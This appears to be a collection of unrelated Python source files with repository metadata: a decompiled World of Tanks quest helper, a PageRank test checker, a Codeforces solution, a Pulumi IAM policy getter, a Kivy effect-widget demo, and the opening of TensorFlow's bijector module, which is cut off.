no_license
chipsi007/WorldOfTanks-Decompiled
d208678a6f2f094b02281d09ecc30f3e32725ce9
3b9dc21321429e4dee146c23c7250f2c62757937
refs/heads/master
2020-03-19T01:21:09.883951
2018-05-04T13:19:56
2018-05-04T13:19:56
135,538,885
0
0
null
null
null
null
UTF-8
Python
false
false
13,682
py
# Python bytecode 2.7 (decompiled from Python 2.7) # Embedded file name: scripts/client/gui/Scaleform/daapi/view/lobby/server_events/events_helpers.py import operator from collections import defaultdict import BigWorld import constants from constants import EVENT_TYPE from gui import makeHtmlString from gui.Scaleform.daapi.view.lobby.server_events.awards_formatters import OldStyleBonusesFormatter from gui.Scaleform.genConsts.QUESTS_ALIASES import QUESTS_ALIASES from gui.Scaleform.locale.PERSONAL_MISSIONS import PERSONAL_MISSIONS from gui.Scaleform.locale.QUESTS import QUESTS from gui.Scaleform.locale.TOOLTIPS import TOOLTIPS from gui.server_events import formatters, conditions, settings as quest_settings from gui.server_events.events_helpers import EventInfoModel, MISSIONS_STATES, QuestInfoModel from gui.shared.formatters import text_styles from helpers import i18n, int2roman, time_utils, dependency from personal_missions import PM_BRANCH from quest_xml_source import MAX_BONUS_LIMIT from skeletons.gui.shared import IItemsCache _AWARDS_PER_PAGE = 3 FINISH_TIME_LEFT_TO_SHOW = time_utils.ONE_DAY START_TIME_LIMIT = 5 * time_utils.ONE_DAY class _EventInfo(EventInfoModel): def getInfo(self, svrEvents, pCur=None, pPrev=None, noProgressInfo=False): if noProgressInfo: status, _ = MISSIONS_STATES.NONE, self._getStatus()[1] bonusCount = self.NO_BONUS_COUNT qProgCur, qProgTot, qProgbarType, tooltip = (0, 0, formatters.PROGRESS_BAR_TYPE.NONE, None) else: bonusCount = self._getBonusCount(pCur) status, _ = self._getStatus(pCur) qProgCur, qProgTot, qProgbarType, tooltip = self._getProgressValues(svrEvents, pCur, pPrev) isAvailable, _ = self.event.isAvailable() return {'questID': str(self.event.getID()), 'eventType': self.event.getType(), 'IGR': self.event.isIGR(), 'taskType': self.event.getUserType(), 'tasksCount': bonusCount, 'progrBarType': qProgbarType, 'progrTooltip': tooltip, 'maxProgrVal': qProgTot, 'currentProgrVal': qProgCur, 'rendererType': QUESTS_ALIASES.RENDERER_TYPE_QUEST, 'timerDescription': self.getTimerMsg(), 'status': status, 'description': self.event.getUserName(), 'tooltip': TOOLTIPS.QUESTS_RENDERER_LABEL, 'isSelectable': True, 'isNew': quest_settings.isNewCommonEvent(self.event), 'isAvailable': isAvailable} def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted): index = 0 progresses = [] if not isProgressReset and not isCompleted: for cond in self.event.bonusCond.getConditions().items: if isinstance(cond, conditions._Cumulativable): for _, (curProg, totalProg, diff, _) in cond.getProgressPerGroup(pCur, pPrev).iteritems(): label = cond.getUserString() if not diff or not label: continue index += 1 progresses.append({'progrTooltip': None, 'progrBarType': formatters.PROGRESS_BAR_TYPE.SIMPLE, 'maxProgrVal': totalProg, 'currentProgrVal': curProg, 'description': '%d. %s' % (index, label), 'progressDiff': '+ %s' % BigWorld.wg_getIntegralFormat(diff)}) if not progresses: return alertMsg = '' if isProgressReset: alertMsg = i18n.makeString('#quests:postBattle/progressReset') _, awards = ('', None) if not isProgressReset and isCompleted: awards = self._getBonuses(svrEvents) return {'title': self.event.getUserName(), 'awards': awards, 'progressList': progresses, 'alertMsg': alertMsg, 'questInfo': self.getInfo(svrEvents, pCur, pPrev), 'personalInfo': [], 'questType': self.event.getType()} @classmethod def _getEventsByIDs(cls, ids, svrEvents): result = {} for eID in ids: if eID in svrEvents: result[eID] = svrEvents[eID] return result def _getBonusCount(self, pCur=None): return self.NO_BONUS_COUNT def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None): return (0, 0, formatters.PROGRESS_BAR_TYPE.NONE, None) def _getBonuses(self, svrEvents, bonuses=None): return [] class _QuestInfo(_EventInfo, QuestInfoModel): PROGRESS_TOOLTIP_MAX_ITEMS = 4 itemsCache = dependency.descriptor(IItemsCache) def _getStatus(self, pCur=None): if self.event.isCompleted(progress=pCur): if self.event.bonusCond.isDaily(): msg = self._getCompleteDailyStatus('#quests:details/status/completed/daily') else: msg = i18n.makeString('#quests:details/status/completed') return (MISSIONS_STATES.COMPLETED, msg) else: isAvailable, errorMsg = self.event.isAvailable() if not isAvailable: timeLeftInfo = self.event.getNearestActivityTimeLeft() if errorMsg in ('in_future', 'invalid_weekday', 'invalid_time_interval') and timeLeftInfo is not None: startTimeLeft = timeLeftInfo[0] if startTimeLeft > START_TIME_LIMIT: fmt = self._getDateTimeString(self.event.getStartTime()) else: fmt = self._getTillTimeString(startTimeLeft) msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg, time=fmt) else: msg = i18n.makeString('#quests:details/status/notAvailable/%s' % errorMsg) return (MISSIONS_STATES.NOT_AVAILABLE, msg) bonus = self.event.bonusCond bonusLimit = bonus.getBonusLimit() if bonusLimit is None or bonusLimit >= MAX_BONUS_LIMIT: msg = i18n.makeString(QUESTS.DETAILS_HEADER_COMPLETION_UNLIMITED) else: groupBy = bonus.getGroupByValue() if bonus.isDaily(): key = QUESTS.DETAILS_HEADER_COMPLETION_DAILY if groupBy is not None: key = '#quests:details/header/completion/daily/groupBy%s' % groupBy.capitalize() else: key = QUESTS.DETAILS_HEADER_COMPLETION_SINGLE if groupBy is not None: key = '#quests:details/header/completion/single/groupBy%s' % groupBy.capitalize() msg = i18n.makeString(key, count=bonusLimit) return (MISSIONS_STATES.NONE, msg) def _getBonuses(self, svrEvents, bonuses=None): bonuses = bonuses or self.event.getBonuses() result = OldStyleBonusesFormatter(self.event).getFormattedBonuses(bonuses) return formatters.todict(result) if result else formatters.todict([formatters.packTextBlock(text_styles.alert('#quests:bonuses/notAvailable'))]) def _getBonusCount(self, pCur=None): if not self.event.isCompleted(progress=pCur): bonusLimit = self.event.bonusCond.getBonusLimit() if bonusLimit is None or bonusLimit > 1 or self.event.bonusCond.getGroupByValue() is not None: return self.event.getBonusCount(progress=pCur) return self.NO_BONUS_COUNT def _getProgressValues(self, svrEvents=None, pCur=None, pPrev=None): current, total, progressType, tooltip = (0, 0, formatters.PROGRESS_BAR_TYPE.NONE, None) groupBy = self.event.bonusCond.getGroupByValue() condsRoot = self.event.bonusCond.getConditions() if self.event.isCompleted(pCur) or condsRoot.isEmpty(): return (current, total, progressType, tooltip) else: countOfCumulatives = 0 cumulatives = defaultdict(list) for cond in condsRoot.items: if isinstance(cond, conditions._Cumulativable): countOfCumulatives += 1 for groupByKey, (cur, tot, _, isCompleted) in cond.getProgressPerGroup(pCur, pPrev).iteritems(): if not isCompleted: cumulatives[groupByKey].append((cur, tot)) if groupBy is None and countOfCumulatives == 1 and cumulatives[None]: (current, total), progressType = cumulatives[None][0], formatters.PROGRESS_BAR_TYPE.SIMPLE else: avgProgressesPerGroup = [] for groupByKey, values in cumulatives.iteritems(): progressesSum = sum([ c / float(t) for c, t in values ]) avgProgressesPerGroup.append((groupByKey, int(round(100.0 * progressesSum / len(values))), 100)) avgProgresses = sorted(avgProgressesPerGroup, key=operator.itemgetter(1), reverse=True) if avgProgresses: (groupByKey, current, total), nearestProgs = avgProgresses[0], avgProgresses[1:] progressType = formatters.PROGRESS_BAR_TYPE.COMMON if groupBy is not None and groupByKey is not None: name, names = ('', '') if groupBy == 'vehicle': name = self.itemsCache.items.getItemByCD(groupByKey).shortUserName names = [ self.itemsCache.items.getItemByCD(intCD).shortUserName for intCD, _, __ in nearestProgs ] elif groupBy == 'nation': name = i18n.makeString('#menu:nations/%s' % groupByKey) names = [ i18n.makeString('#menu:nations/%s' % n) for n, _, __ in nearestProgs ] elif groupBy == 'class': name = i18n.makeString('#menu:classes/%s' % groupByKey) names = [ i18n.makeString('#menu:classes/%s' % n) for n, _, __ in nearestProgs ] elif groupBy == 'level': def makeLvlStr(lvl): return i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_NOTE_LEVEL, int2roman(lvl)) name = makeLvlStr(int(groupByKey.replace('level ', ''))) names = [ makeLvlStr(int(l.replace('level ', ''))) for l, _, __ in nearestProgs ] note = None if names: note = makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'note', {'names': ', '.join(names[:self.PROGRESS_TOOLTIP_MAX_ITEMS])}) tooltip = {'header': i18n.makeString(QUESTS.TOOLTIP_PROGRESS_GROUPBY_HEADER), 'body': makeHtmlString('html_templates:lobby/quests/tooltips/progress', 'body', {'name': name}), 'note': note} return (current, total, progressType, tooltip) class _PersonalMissionInfo(_QuestInfo): def _getBonuses(self, svrEvents, _=None): mainBonuses = self.event.getBonuses(isMain=True) addBonuses = self.event.getBonuses(isMain=False) return (_QuestInfo._getBonuses(self, None, bonuses=mainBonuses), _QuestInfo._getBonuses(self, None, bonuses=addBonuses)) def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted): def _packCondition(titleKey, text): return '%s\n%s' % (text_styles.middleTitle(i18n.makeString(titleKey)), text_styles.main(text)) def _packStatus(completed): return 'done' if completed else 'notDone' return {'title': self.event.getUserName(), 'questInfo': self.getInfo(svrEvents), 'awards': None, 'progressList': [], 'alertMsg': '', 'personalInfo': [{'statusStr': _packStatus(isCompleted[0]), 'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_MAINCONDITIONS, self.event.getUserMainCondition())}, {'statusStr': _packStatus(isCompleted[1]), 'text': _packCondition(PERSONAL_MISSIONS.TASKDETAILSVIEW_ADDITIONALCONDITIONS, self.event.getUserAddCondition())}], 'questType': self.event.getType()} class _MotiveQuestInfo(_QuestInfo): def getPostBattleInfo(self, svrEvents, pCur, pPrev, isProgressReset, isCompleted): motiveQuests = [ q for q in svrEvents.values() if q.getType() == EVENT_TYPE.MOTIVE_QUEST and not q.isCompleted() ] info = super(_MotiveQuestInfo, self).getPostBattleInfo(svrEvents, pCur, pPrev, isProgressReset, isCompleted) info.update({'isLinkBtnVisible': len(motiveQuests) > 0}) return info def getEventInfoData(event): if event.getType() == constants.EVENT_TYPE.PERSONAL_MISSION: return _PersonalMissionInfo(event) if event.getType() == constants.EVENT_TYPE.MOTIVE_QUEST: return _MotiveQuestInfo(event) return _QuestInfo(event) if event.getType() in constants.EVENT_TYPE.QUEST_RANGE else _EventInfo(event) def getEventPostBattleInfo(event, svrEvents=None, pCur=None, pPrev=None, isProgressReset=False, isCompleted=False): return getEventInfoData(event).getPostBattleInfo(svrEvents, pCur or {}, pPrev or {}, isProgressReset, isCompleted) _questBranchToTabMap = {PM_BRANCH.REGULAR: QUESTS_ALIASES.SEASON_VIEW_TAB_RANDOM}
181d1d5084af6522c9e3c33e95be5e086608176e
a38b4c82feabe5be163ad2eeb5a46f38aeb88d77
/regressions/checkPageRank.py
6980c594526fb6e07683fdcf02458c065697e1c9
[ "Apache-2.0" ]
permissive
zzmjohn/vertexAPI2
a9ae240c2fde55dc5be4a96f0017e8a2e204b258
cf59a50d1239f3ea892a7473f8175958c7ac0051
refs/heads/master
2020-12-29T01:23:04.602915
2013-12-16T18:32:17
2013-12-16T18:32:17
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,570
py
#!/usr/bin/python2 #script to compare pagerank outputs import sys from math import fabs #load ranks for file fn def load( f ): ret = {} for line in f: vid, val = line.strip().split() ret[ int(vid) ] = float(val) return ret def compare( tol_vals, tol_allowed, test, gold ): histo_counts = [0] * (len(tol_vals) + 1) for vid, val in test.items(): try: diff = fabs( gold[ vid ] - val ) pos = len(tol_vals) - 1 while pos >= 0 and diff < tol_vals[pos]: pos -= 1 histo_counts[pos + 1] += 1 except KeyError: print "vid ", vid, " is in test but not in gold" #this is not an error, we just output all vertices #but powergraph does not #return False totalItems = float(len(test)) for idx in range(len(histo_counts)): histo_counts[idx] /= totalItems if histo_counts[idx] > tol_allowed[idx]: print "Percentage too high: ", tol_allowed[idx], histo_counts[idx] return False return True if __name__ == '__main__': if len( sys.argv ) != 3: print "Usage: checkPageRank.py test gold" sys.exit(1) test = sys.argv[1] gold = sys.argv[2] td = load( open(test) ) gd = load( open(gold) ) #this means we allow up to 100% of values differing by less than .0001 #.9% of values by more than .0001 and less than .001 #.09% of values by more than .001 and less than .01 #.009% of values by more than .01 and less than .1 #0 values more than .1 if not compare( [.0001, .001, .01, .1, 1, 10], [1., 1e-2, 5e-3, 5e-4, 5e-5, 5e-6, 0], td, gd ): sys.exit(1)
b5aab17911c032c7a93a159e063628fc4536e61e
bcb56cc126ea1885eb5ecc920884e2e331def045
/Part A/Déjà Vu.py
a510d4a81463d13148adb3624a1c08c02197962b
[]
no_license
priyanshkedia04/Codeforces-Solutions
2d11cb7b8329fe658f983b7212c17fc89fd784f0
a5197c633bf4c3238f48bfb5b308144c2ffba473
refs/heads/main
2023-06-06T13:10:13.787843
2021-07-01T14:06:52
2021-07-01T14:06:52
382,000,707
0
0
null
null
null
null
UTF-8
Python
false
false
222
py
for i in range(int(input())): s = input() temp1 = s + 'a' temp2 = 'a' + s if temp2 != temp2[::-1]: print('YES') print(temp2) elif temp1 != temp1[::-1]: print('YES') print(temp1) else: print('NO')
a373c25612d158c45a37dc78cace10f973142be9
824b582c2e0236e987a29b233308917fbdfc57a7
/sdk/python/pulumi_google_native/datacatalog/v1/get_taxonomy_iam_policy.py
f0fed1764ad2f9761170c7b668b41b7acf80b119
[ "BSD-3-Clause", "Apache-2.0" ]
permissive
24601/pulumi-google-native
ce8faf8455609a9572a8cbe0638c66427bf0ae7f
b219a14201c6c58eaa10caaeacbdaab528931adf
refs/heads/master
2023-08-23T05:48:31.819709
2021-10-08T18:50:44
2021-10-08T18:50:44
null
0
0
null
null
null
null
UTF-8
Python
false
false
5,399
py
# coding=utf-8 # *** WARNING: this file was generated by the Pulumi SDK Generator. *** # *** Do not edit by hand unless you're certain you know what you are doing! *** import warnings import pulumi import pulumi.runtime from typing import Any, Mapping, Optional, Sequence, Union, overload from ... import _utilities from . import outputs __all__ = [ 'GetTaxonomyIamPolicyResult', 'AwaitableGetTaxonomyIamPolicyResult', 'get_taxonomy_iam_policy', 'get_taxonomy_iam_policy_output', ] @pulumi.output_type class GetTaxonomyIamPolicyResult: def __init__(__self__, bindings=None, etag=None, version=None): if bindings and not isinstance(bindings, list): raise TypeError("Expected argument 'bindings' to be a list") pulumi.set(__self__, "bindings", bindings) if etag and not isinstance(etag, str): raise TypeError("Expected argument 'etag' to be a str") pulumi.set(__self__, "etag", etag) if version and not isinstance(version, int): raise TypeError("Expected argument 'version' to be a int") pulumi.set(__self__, "version", version) @property @pulumi.getter def bindings(self) -> Sequence['outputs.BindingResponse']: """ Associates a list of `members` to a `role`. Optionally, may specify a `condition` that determines how and when the `bindings` are applied. Each of the `bindings` must contain at least one member. """ return pulumi.get(self, "bindings") @property @pulumi.getter def etag(self) -> str: """ `etag` is used for optimistic concurrency control as a way to help prevent simultaneous updates of a policy from overwriting each other. It is strongly suggested that systems make use of the `etag` in the read-modify-write cycle to perform policy updates in order to avoid race conditions: An `etag` is returned in the response to `getIamPolicy`, and systems are expected to put that etag in the request to `setIamPolicy` to ensure that their change will be applied to the same version of the policy. **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. """ return pulumi.get(self, "etag") @property @pulumi.getter def version(self) -> int: """ Specifies the format of the policy. Valid values are `0`, `1`, and `3`. Requests that specify an invalid value are rejected. Any operation that affects conditional role bindings must specify version `3`. This requirement applies to the following operations: * Getting a policy that includes a conditional role binding * Adding a conditional role binding to a policy * Changing a conditional role binding in a policy * Removing any role binding, with or without a condition, from a policy that includes conditions **Important:** If you use IAM Conditions, you must include the `etag` field whenever you call `setIamPolicy`. If you omit this field, then IAM allows you to overwrite a version `3` policy with a version `1` policy, and all of the conditions in the version `3` policy are lost. If a policy does not include any conditions, operations on that policy may specify any valid version or leave the field unset. To learn which resources support conditions in their IAM policies, see the [IAM documentation](https://cloud.google.com/iam/help/conditions/resource-policies). """ return pulumi.get(self, "version") class AwaitableGetTaxonomyIamPolicyResult(GetTaxonomyIamPolicyResult): # pylint: disable=using-constant-test def __await__(self): if False: yield self return GetTaxonomyIamPolicyResult( bindings=self.bindings, etag=self.etag, version=self.version) def get_taxonomy_iam_policy(location: Optional[str] = None, project: Optional[str] = None, taxonomy_id: Optional[str] = None, opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetTaxonomyIamPolicyResult: """ Gets the IAM policy for a policy tag or a taxonomy. """ __args__ = dict() __args__['location'] = location __args__['project'] = project __args__['taxonomyId'] = taxonomy_id if opts is None: opts = pulumi.InvokeOptions() if opts.version is None: opts.version = _utilities.get_version() __ret__ = pulumi.runtime.invoke('google-native:datacatalog/v1:getTaxonomyIamPolicy', __args__, opts=opts, typ=GetTaxonomyIamPolicyResult).value return AwaitableGetTaxonomyIamPolicyResult( bindings=__ret__.bindings, etag=__ret__.etag, version=__ret__.version) @_utilities.lift_output_func(get_taxonomy_iam_policy) def get_taxonomy_iam_policy_output(location: Optional[pulumi.Input[str]] = None, project: Optional[pulumi.Input[Optional[str]]] = None, taxonomy_id: Optional[pulumi.Input[str]] = None, opts: Optional[pulumi.InvokeOptions] = None) -> pulumi.Output[GetTaxonomyIamPolicyResult]: """ Gets the IAM policy for a policy tag or a taxonomy. """ ...
7e79b503b18d0387b9dfa5034bb0f9a4e2e53d84
48d1002394d233cf5932c7ef69300400af79118a
/examples/widgets/effectwidget.py
aeaf2d149fa96c8762405a9a404318773e80f479
[ "LGPL-2.1-only", "MIT", "Apache-2.0" ]
permissive
kivy/kivy
ba2668bffe4e125fd1c5aace54f671343802850e
ca1b918c656f23e401707388f25f4a63d9b8ae7d
refs/heads/master
2023-09-04T02:27:05.311875
2023-08-26T08:00:20
2023-08-26T08:00:20
1,049,095
16,076
4,161
MIT
2023-09-09T07:55:18
2010-11-03T20:27:32
Python
UTF-8
Python
false
false
5,485
py
''' Example usage of the effectwidget. Currently highly experimental. ''' from kivy.app import App from kivy.uix.effectwidget import EffectWidget from kivy.uix.spinner import Spinner from kivy.uix.boxlayout import BoxLayout from kivy.lang import Builder from kivy.properties import ObjectProperty from kivy.uix.effectwidget import (MonochromeEffect, InvertEffect, ChannelMixEffect, ScanlinesEffect, FXAAEffect, PixelateEffect, HorizontalBlurEffect, VerticalBlurEffect) class ComparisonWidget(EffectWidget): pass class EffectSpinner(Spinner): pass class SpinnerRow(BoxLayout): effectwidget = ObjectProperty() def update_effectwidget(self, *args): effects = [] for child in self.children[::-1]: text = child.text if text == 'none': pass if text == 'fxaa': effects.append(FXAAEffect()) if text == 'monochrome': effects.append(MonochromeEffect()) if text == 'invert': effects.append(InvertEffect()) if text == 'mix': effects.append(ChannelMixEffect()) if text == 'blur_h': effects.append(HorizontalBlurEffect()) if text == 'blur_v': effects.append(VerticalBlurEffect()) if text == 'postprocessing': effects.append(ScanlinesEffect()) if text == 'pixelate': effects.append(PixelateEffect()) if self.effectwidget: self.effectwidget.effects = effects example = Builder.load_string(''' #:import Vector kivy.vector.Vector BoxLayout: orientation: 'vertical' FloatLayout: ComparisonWidget: pos_hint: {'x': 0, 'y': 0} size_hint: 0.5, 1 id: effect1 ComparisonWidget: pos_hint: {'x': pos_slider.value, 'y': 0} size_hint: 0.5, 1 id: effect2 background_color: (rs.value, gs.value, bs.value, als.value) SpinnerRow: effectwidget: effect1 text: 'left effects' SpinnerRow: effectwidget: effect2 text: 'right effects' BoxLayout: size_hint_y: None height: sp(40) Label: text: 'control overlap:' Slider: min: 0 max: 0.5 value: 0.5 id: pos_slider BoxLayout: size_hint_y: None height: sp(40) Label: text: 'right bg r,g,b,a' Slider: min: 0 max: 1 value: 0 id: rs Slider: min: 0 max: 1 value: 0 id: gs Slider: min: 0 max: 1 value: 0 id: bs Slider: min: 0 max: 1 value: 0 id: als <ComparisonWidget>: Widget: canvas: Color: rgba: 1, 0, 0, 1 Ellipse: pos: Vector(self.pos) + 0.5*Vector(self.size) size: 0.4*Vector(self.size) Color: rgba: 0, 1, 0.3, 1 Ellipse: pos: Vector(self.pos) + 0.1*Vector(self.size) size: 0.6*Vector(self.size) Color: rgba: 0.5, 0.3, 0.8, 1 Ellipse: pos: Vector(self.pos) + Vector([0, 0.6])*Vector(self.size) size: 0.4*Vector(self.size) Color: rgba: 1, 0.8, 0.1, 1 Ellipse: pos: Vector(self.pos) + Vector([0.5, 0])*Vector(self.size) size: 0.4*Vector(self.size) Color: rgba: 0, 0, 0.8, 1 Line: points: [self.x, self.y, self.x + self.width, self.y + 0.3*self.height, self.x + 0.2*self.width, self.y + 0.1*self.height, self.x + 0.85*self.width, self.y + 0.72*self.height, self.x + 0.31*self.width, self.y + 0.6*self.height, self.x, self.top] width: 1 Color: rgba: 0, 0.9, 0.1, 1 Line: points: [self.x + self.width, self.y + self.height, self.x + 0.35*self.width, self.y + 0.6*self.height, self.x + 0.7*self.width, self.y + 0.15*self.height, self.x + 0.2*self.width, self.y + 0.22*self.height, self.x + 0.3*self.width, self.y + 0.92*self.height] width: 2 <SpinnerRow>: orientation: 'horizontal' size_hint_y: None height: dp(40) text: '' Label: text: root.text EffectSpinner: on_text: root.update_effectwidget() EffectSpinner: on_text: root.update_effectwidget() EffectSpinner: on_text: root.update_effectwidget() <EffectSpinner>: text: 'none' values: ['none', 'fxaa', 'monochrome', 'invert', 'mix', 'blur_h', 'blur_v', 'postprocessing', 'pixelate',] ''') class EffectApp(App): def build(self): return example EffectApp().run()
5c0f91846cc2feeb9b6bc2da717f71a9af08ea58
d99e5b65624f115db6982dd88af9390e8d766042
/tensorflow/contrib/distributions/python/ops/bijector.py
7a089bb53be8450af76210f20a513e17fe54b1c3
[ "Apache-2.0" ]
permissive
golbin/tensorflow
03dbecb6f093f5628c072086c780659bcc14dba8
8a58a304bdcf909f8b55ec49e9280fc3af01c7d3
refs/heads/master
2021-01-12T07:05:41.360503
2016-12-20T00:15:41
2016-12-20T00:15:41
76,907,006
2
0
null
2016-12-19T23:58:44
2016-12-19T23:58:43
null
UTF-8
Python
false
false
93,743
py
# Copyright 2016 The TensorFlow Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================== r"""Bijector Ops. An API for invertible, differentiable transformations of random variables. ## Background Differentiable, bijective transformations of continuous random variables alter the calculations made in the cumulative/probability distribution functions and sample function. This module provides a standard interface for making these manipulations. For more details and examples, see the `Bijector` docstring. To apply a `Bijector`, use `distributions.TransformedDistribution`. ## Bijectors @@Affine @@AffineLinearOperator @@Bijector @@Chain @@CholeskyOuterProduct @@Exp @@Identity @@Inline @@Invert @@SigmoidCentered @@SoftmaxCentered @@Softplus """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import abc import collections import contextlib import itertools import math import re import numpy as np import six from tensorflow.contrib import framework as contrib_framework from tensorflow.contrib.distributions.python.ops import operator_pd_cholesky from tensorflow.contrib.distributions.python.ops import operator_pd_diag from tensorflow.contrib.distributions.python.ops import operator_pd_identity from tensorflow.contrib.distributions.python.ops import operator_pd_vdvt_update from tensorflow.contrib.distributions.python.ops.shape import _DistributionShape from tensorflow.contrib.linalg.python.ops import linear_operator from tensorflow.python.framework import constant_op from tensorflow.python.framework import dtypes from tensorflow.python.framework import ops from tensorflow.python.framework import tensor_shape from tensorflow.python.framework import tensor_util from tensorflow.python.ops import array_ops from tensorflow.python.ops import check_ops from tensorflow.python.ops import control_flow_ops from tensorflow.python.ops import linalg_ops from tensorflow.python.ops import math_ops from tensorflow.python.ops import nn_ops __all__ = [ "Affine", "AffineLinearOperator", "Bijector", "Chain", "CholeskyOuterProduct", "Exp", "Identity", "Inline", "Invert", "PowerTransform", "SigmoidCentered", "SoftmaxCentered", "Softplus", ] # TODO(jvdillon): deprecate this function once tf.expm1 exists. def _expm1(x): """Approximate exp{y}-1~=y for small |y|, and exp{y}-1 elsewhere.""" # Recall, eps is smallest positive number such that 1 + eps != 1. eps = np.finfo(x.dtype.base_dtype.as_numpy_dtype).eps # Note we are careful to never send an NaN through ANY branch of where. return array_ops.where(math_ops.less(math_ops.abs(x), eps), x, math_ops.exp(x) - 1.) def _as_tensor(x, name): """Convenience to convert to `Tensor` or leave as `None`.""" return None if x is None else ops.convert_to_tensor(x, name=name) class _Mapping(collections.namedtuple("_Mapping", ["x", "y", "ildj", "condition_kwargs"])): """Helper class to make it easier to manage caching in `Bijector`.""" def __new__(cls, x=None, y=None, ildj=None, condition_kwargs=None): """Custom __new__ so namedtuple items have defaults. Args: x: `Tensor`. Forward. y: `Tensor`. Inverse. ildj: `Tensor`. Inverse log det Jacobian. condition_kwargs: Python dictionary. Extra args supplied to forward/inverse/etc functions. Returns: mapping: New instance of _Mapping. """ return super(_Mapping, cls).__new__(cls, x, y, ildj, condition_kwargs) @property def x_key(self): """Returns key used for caching Y=g(X).""" return (self.x,) + self._deep_tuple(tuple(sorted( self.condition_kwargs.items()))) @property def y_key(self): """Returns key used for caching X=g^{-1}(Y).""" return (self.y,) + self._deep_tuple(tuple(sorted( self.condition_kwargs.items()))) def merge(self, x=None, y=None, ildj=None, condition_kwargs=None, mapping=None): """Returns new _Mapping with args merged with self. Args: x: `Tensor`. Forward. y: `Tensor`. Inverse. ildj: `Tensor`. Inverse log det Jacobian. condition_kwargs: Python dictionary. Extra args supplied to forward/inverse/etc functions. mapping: Instance of _Mapping to merge. Can only be specified if no other arg is specified. Returns: mapping: New instance of `_Mapping` which has inputs merged with self. Raises: ValueError: if mapping and any other arg is not `None`. """ if mapping is None: mapping = _Mapping(x=x, y=y, ildj=ildj, condition_kwargs=condition_kwargs) elif not all(arg is None for arg in [x, y, ildj, condition_kwargs]): raise ValueError("Cannot specify mapping and individual args.") return _Mapping( x=self._merge(self.x, mapping.x), y=self._merge(self.y, mapping.y), ildj=self._merge(self.ildj, mapping.ildj), condition_kwargs=self._merge(self.condition_kwargs, mapping.condition_kwargs)) def _merge(self, old, new): """Helper to merge which handles merging one value.""" if old is None: return new elif new is not None and old != new: raise ValueError("Incompatible values: %s != %s" % (old, new)) return old def _deep_tuple(self, x): """Converts lists of lists to tuples of tuples.""" return (tuple(map(self._deep_tuple, x)) if isinstance(x, (list, tuple)) else x) @six.add_metaclass(abc.ABCMeta) class Bijector(object): """Interface for transforming a `Distribution` sample. A `Bijector` implements a [diffeomorphism](https://en.wikipedia.org/wiki/Diffeomorphism), i.e., a bijective, differentiable function. A `Bijector` is used by `TransformedDistribution` but can be generally used for transforming a `Distribution` generated `Tensor`. A `Bijector` is characterized by three operations: 1. Forward Evaluation Useful for turning one random outcome into another random outcome from a different distribution. 2. Inverse Evaluation Useful for "reversing" a transformation to compute one probability in terms of another. 3. (log o det o Jacobian o inverse)(x) "The log of the determinant of the matrix of all first-order partial derivatives of the inverse function." Useful for inverting a transformation to compute one probability in terms of another. Geometrically, the det(Jacobian) is the volume of the transformation and is used to scale the probability. By convention, transformations of random variables are named in terms of the forward transformation. The forward transformation creates samples, the inverse is useful for computing probabilities. Example Use: - Basic properties: ```python x = ... # A tensor. # Evaluate forward transformation. fwd_x = my_bijector.forward(x) x == my_bijector.inverse(fwd_x) x != my_bijector.forward(fwd_x) # Not equal because g(x) != g(g(x)). ``` - Computing a log-likelihood: ```python def transformed_log_pdf(bijector, log_pdf, x): return (bijector.inverse_log_det_jacobian(x) + log_pdf(bijector.inverse(x))) ``` - Transforming a random outcome: ```python def transformed_sample(bijector, x): return bijector.forward(x) ``` Example transformations: - "Exponential" ``` Y = g(X) = exp(X) X ~ Normal(0, 1) # Univariate. ``` Implies: ``` g^{-1}(Y) = log(Y) |Jacobian(g^{-1})(y)| = 1 / y Y ~ LogNormal(0, 1), i.e., prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y)) = (1 / y) Normal(log(y); 0, 1) ``` Here is an example of how one might implement the `Exp` bijector: ``` class Exp(Bijector): def __init__(self, event_ndims=0, validate_args=False, name="exp"): super(Exp, self).__init__(batch_ndims=0, event_ndims=event_ndims, validate_args=validate_args, name=name) def _forward(self, x): return math_ops.exp(x) def _inverse_and_inverse_log_det_jacobian(self, y): x = math_ops.log(y) return x, -self._forward_log_det_jacobian(x) def _forward_log_det_jacobian(self, x): if self.shaper is None: raise ValueError("Jacobian requires known event_ndims.") _, _, event_dims = self.shaper.get_dims(x) return math_ops.reduce_sum(x, reduction_indices=event_dims) ``` - "Affine" ``` Y = g(X) = sqrtSigma * X + mu X ~ MultivariateNormal(0, I_d) ``` Implies: ``` g^{-1}(Y) = inv(sqrtSigma) * (Y - mu) |Jacobian(g^{-1})(y)| = det(inv(sqrtSigma)) Y ~ MultivariateNormal(mu, sqrtSigma) , i.e., prob(Y=y) = |Jacobian(g^{-1})(y)| * prob(X=g^{-1}(y)) = det(sqrtSigma)^(-d) * MultivariateNormal(inv(sqrtSigma) * (y - mu); 0, I_d) ``` Example of why a `Bijector` needs to understand sample, batch, event partitioning: - Consider the `Exp` `Bijector` applied to a `Tensor` which has sample, batch, and event (S, B, E) shape semantics. Suppose the `Tensor`'s partitioned-shape is `(S=[4], B=[2], E=[3, 3])`. For `Exp`, the shape of the `Tensor` returned by `forward` and `inverse` is unchanged, i.e., `[4, 2, 3, 3]`. However the shape returned by `inverse_log_det_jacobian` is `[4, 2]` because the Jacobian is a reduction over the event dimensions. Subclass Requirements: - Typically subclasses implement `_forward` and one or both of: - 